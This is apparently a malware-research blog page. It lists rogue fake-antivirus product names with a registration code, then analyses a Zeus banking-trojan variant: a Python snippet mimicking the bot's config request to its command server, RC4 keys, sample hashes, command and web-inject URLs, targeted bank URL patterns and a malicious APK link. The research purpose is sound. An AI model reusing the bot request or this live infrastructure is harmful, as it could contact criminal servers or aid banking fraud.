Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master




To register (and help removal), copy paste this code: 0W000-000B0-00T00-E0021

Windows Defence Unit

Windows Defence Unit is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows Protection Booster, Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master




To register (and help removal), copy paste this code: 0W000-000B0-00T00-E0021

Windows Protection Booster

Windows Protection Booster is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master




To register (and help removal), copy paste this code: 0W000-000B0-00T00-E0021

Zeus 1.1.3.4

RSA FirstWatch throw me recently a sample of a 'new' Zeus variant.
I didn't really check all the changes that were made but seem it's nothing more than just a standard Zeus v2.
But wait, it communicates over SSL and had a new kind of HTTP request pattern:

Fiddler:

Config download in python:
import urllib2

request = urllib2.Request('https://secureinformat.com/?ajax')
request.add_header('Accept', '*/*')
request.add_header('X_ID', '14E255CE7875768FBC303C10')
request.add_header('X_OS', '510')
request.add_header('X_BV', '1.1.3.4')
request.add_header('Control', 'no-cache')
request.add_header('User-Agent', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729;')
page = urllib2.urlopen(request).read()
open('ajax', 'w').write(page)

Notice the new headers:
X_ID = Bot ID
X_OS = OS version
X_BV = Variant version

The answer of the server have X_ID as cookie:
<< HTTP/1.1 200 OK
<< Date: Fri, 28 Feb 2014 06:35:34 GMT
<< Server: Apache
<< Set-Cookie: X_ID=14E255CE7875768FBC303C10; expires=Sat, 28-Feb-2015 06:35:34 GMT; path=/
<< Content-Description: File Transfer
<< Content-Disposition: attachment; filename=ajax
<< Content-Transfer-Encoding: binary
<< Expires: 0
<< Cache-Control: must-revalidate, post-check=0, pre-check=0
<< Pragma: public
<< Content-Length: 3685
<< Connection: close
<< Content-Type: application/octet-stream

Sample: bb9fe8c3df598b8b6ea2f2653c38ecd2
Version: 1.1.3.4
RC4: E2 82 3E B3 04 11 15 34 17 64 01 DC 7D B8 A5 35 CB 00 19 AA 81 59 6E 1B 85 7E 44 CA 10 90 40 2A C3 36 20 C5 C2 55 E6 F4 43 67 5B 42 4D 21 98 D4 78 70 1A 6F 72 24 88 B4 0A E7 B9 BC C1 8E 8F 79 86 CC 5F 46 FC A9 1C F0 74 E0 C0 3F 8D DD EC 4C 66 A0 02 97 C6 99 BB 7F 0D A8 3A 27 07 E8 75 80 28 54 93 D3 BD 2C EA 9D F6 0B 45 2E F1 EB A3 0E 9E BA 4B 9F 09 89 56 29 C4 48 23 14 2F DA F5 39 3B 8C CD 2B 37 41 A2 95 0F C9 BE AD F8 D7 DE C8 B5 0C 76 51 DF 5D B2 D6 AC 83 52 08 50 92 E1 B0 9C AE CF E4 ED B1 5E 7C 6A 96 65 26 87 2D 12 8A 9A A4 FF 94 D2 7A C7 47 31 7B EE CE DB 32 B7 06 D1 F2 EF AB AF 3C 18 84 E3 22 61 03 3D D9 9B 05 58 D8 30 F7 F3 B6 62 8B 1E 6C 71 FA 4A 4E 63 60 4F 16 6D 25 FB 53 FD 13 33 D0 E9 73 68 F9 69 A6 38 57 6B 5A 49 1D A1 A7 1F BF 5C D5 E5 91 77 FE
Drop Point: http://localhost/gate.php
Infection Point: http://localhost/bot.exe
Update Point:
http://secureinformat.com/?ajax (static config)

For unpacking the config, here again nothing new, regular Zeus v2.
Once unpacked, we can see that the malware is targeting German banks and Trusteer:
http*://*netbanking.sparkasse.at/hilfe/sicherheit*
https://*banking.berliner-bank.de/trxm*
https://*banking.co.at*
https://*commerzbank.de*
https://*commerzbanking.de*
https://*meine.deutsche-bank.de/trxm/db*
https://*meine.norisbank.de/trxm/noris*
https://banking.postbank.de/rai*
https://banking.sparda.de*
https://finanzportal.fiducia.de*
https://netbanking.sparkasse.at/*
https://netbanking.sparkasse.at/casserver/login*
https://netbanking.sparkasse.at/sPortal/*
https://online-*.unicredit.it/*
https://online.bankaustria.at*
https://*commerzbank.de*
https://*commerzbanking.de*
https://*meine.deutsche-bank.de/trxm/db*
https://*meine.norisbank.de/trxm/noris*
https://www.trusteer.com/ProtectYourMoney*
WebInjects:
https://secure730.com/oz1/service.in?id=50
https://secure730.com/oz1/service.in?id=44
https://secure730.com/oz1/service.in?id=43
https://secure730.com/oz1/service.in?id=41
https://secure730.com/oz1/service.in?id=7
https://secure730.com/oz1/service.in?id=6
https://secure730.com/oz1/service.in?id=4
https://secure730.com/oz1/service.in?id=3
https://secure730.com/oz1/service.in?id=2
https://secure730.com/oz1/service.in?id=1
https://secureinformat.com/id/351
https://secureinformat.com/id/350
https://secureinformat.com/id/51
https://secureinformat.com/id/10

Man in the browser:

Clean browser surfing Trusteer website:

Infected browser surfing Trusteer website:
Requesting the user to download an APK:
Test done on the latest Firefox version (v27.0.1)

bit.ly/1jmQHmA = hxtp://shlyxiest.biz/cdn/Trusteer-Mobile.apk
>> https://www.virustotal.com/en/file/2f82ce7288137c0acbeefd9ef9f63926057871611703e77803b842201009767a/analysis/1393786189/
Phone number:  79670478968

Identified as Perkel.c by Kaspersky, Perkel is an android malware who was sold by Perkele (this guy was later banned from underground forums for scaming but it's another story)

Sort of Fake AV:

Sample: 917df7b6268ba705b192b89a1cf28764
Version: 1.1.3.4
RC4: E2 82 3E B3 04 11 15 34 17 64 01 DC 7D B8 A5 35 CB 00 19 AA 81 59 6E 1B 85 7E 44 CA 10 90 40 2A C3 36 20 C5 C2 55 E6 F4 43 67 5B 42 4D 21 98 D4 78 70 1A 6F 72 24 88 B4 0A E7 B9 BC C1 8E 8F 79 86 CC 5F 46 FC A9 1C F0 74 E0 C0 3F 8D DD EC 4C 66 A0 02 97 C6 99 BB 7F 0D A8 3A 27 07 E8 75 80 28 54 93 D3 BD 2C EA 9D F6 0B 45 2E F1 EB A3 0E 9E BA 4B 9F 09 89 56 29 C4 48 23 14 2F DA F5 39 3B 8C CD 2B 37 41 A2 95 0F C9 BE AD F8 D7 DE C8 B5 0C 76 51 DF 5D B2 D6 AC 83 52 08 50 92 E1 B0 9C AE CF E4 ED B1 5E 7C 6A 96 65 26 87 2D 12 8A 9A A4 FF 94 D2 7A C7 47 31 7B EE CE DB 32 B7 06 D1 F2 EF AB AF 3C 18 84 E3 22 61 03 3D D9 9B 05 58 D8 30 F7 F3 B6 62 8B 1E 6C 71 FA 4A 4E 63 60 4F 16 6D 25 FB 53 FD 13 33 D0 E9 73 68 F9 69 A6 38 57 6B 5A 49 1D A1 A7 1F BF 5C D5 E5 91 77 FE
Drop Point: http://localhost/gate.php
Infection Point: http://localhost/bot.exe
Update Points:
https://koloboktv.com/?ajax (static config)
https://securestakan2.net/?ajax (dynamic config)
https://securemagnit5.net/?ajax (dynamic config)
WebInjects:
https://pikachujp.com/oz1/service.in?id=50
https://pikachujp.com/oz1/service.in?id=44
https://pikachujp.com/oz1/service.in?id=43
https://pikachujp.com/oz1/service.in?id=41
https://pikachujp.com/oz1/service.in?id=7
https://pikachujp.com/oz1/service.in?id=6
https://pikachujp.com/oz1/service.in?id=4
https://pikachujp.com/oz1/service.in?id=3
https://pikachujp.com/oz1/service.in?id=2
https://pikachujp.com/oz1/service.in?id=1
https://koloboktv.com/id/351
https://koloboktv.com/id/350
https://koloboktv.com/id/51
https://koloboktv.com/id/10

Sample: 7fb62987f20b002475cb1499eb86a1f5
Version: 1.1.2.1
RC4: 30 72 E6 32 80 EF BD 92 BE DD 3B 1C 58 45 33 2F 41 53 A9 26 8E 20 4D 8A DB 6A F6 8B CE 4C B6 38 02 2B 6C 15 A1 2C 2D C2 ED 0E BB BF 64 40 F1 9F D2 36 07 C3 CF 8D AA D3 A5 42 C0 9B 48 49 67 81 98 75 51 1B 96 6E 97 4A 59 DE 44 65 85 7B 35 16 0C 23 4F FE 5B FA D7 84 A7 46 EE 82 DF E1 6B AD 94 CB 18 C4 8C 0F E7 00 E0 7E CA 24 1A 7A A6 73 3C 03 F5 9C EA 1E FB D4 0B 14 11 22 06 F4 6D 55 E5 93 F9 E2 69 D5 CD 27 E8 12 C8 77 0D 08 A2 B7 0A 01 D8 EB 3F AB 3A 61 83 04 86 CC FD F3 5F 63 09 AC AF 66 17 B9 56 19 F2 C7 47 43 25 1D 89 29 99 2E C1 87 54 C9 62 34 74 4B A0 B1 3E 21 57 52 2A 39 FF 05 BC C6 A4 4E 3D 9D E3 D9 BA 76 5C AE A3 FC B4 B3 D6 28 5A 68 F7 31 7D 7F E4 1F 37 D1 90 B5 B0 D0 C5 79 DA 13 71 A8 7C EC F8 E9 60 50 88 78 70 10 B2 5E 8F 6F 9A B8 95 DC 9E 91 F0 5D
Update Point:
https://securestatic.com/?ajax (static config)

All these samples use the same IP range:
• dns: 1 ›› ip: 37.228.92.170 - adress: SECURE730.COM
• dns: 1 ›› ip: 37.228.92.169 - adress: SECUREINFORMAT.COM
• dns: 1 ›› ip: 37.228.92.148 - adress: SHLYXIEST.BIZ
• dns: 1 ›› ip: 37.228.92.147 - adress: SECURESTATIC.COM
• dns: 1 ›› ip: 37.228.92.146 - adress: KOLOBOKTV.COM

I've wrote a small yara rule in hope to see more of these.
All configs that i grabbed was reporting to localhost not to a server...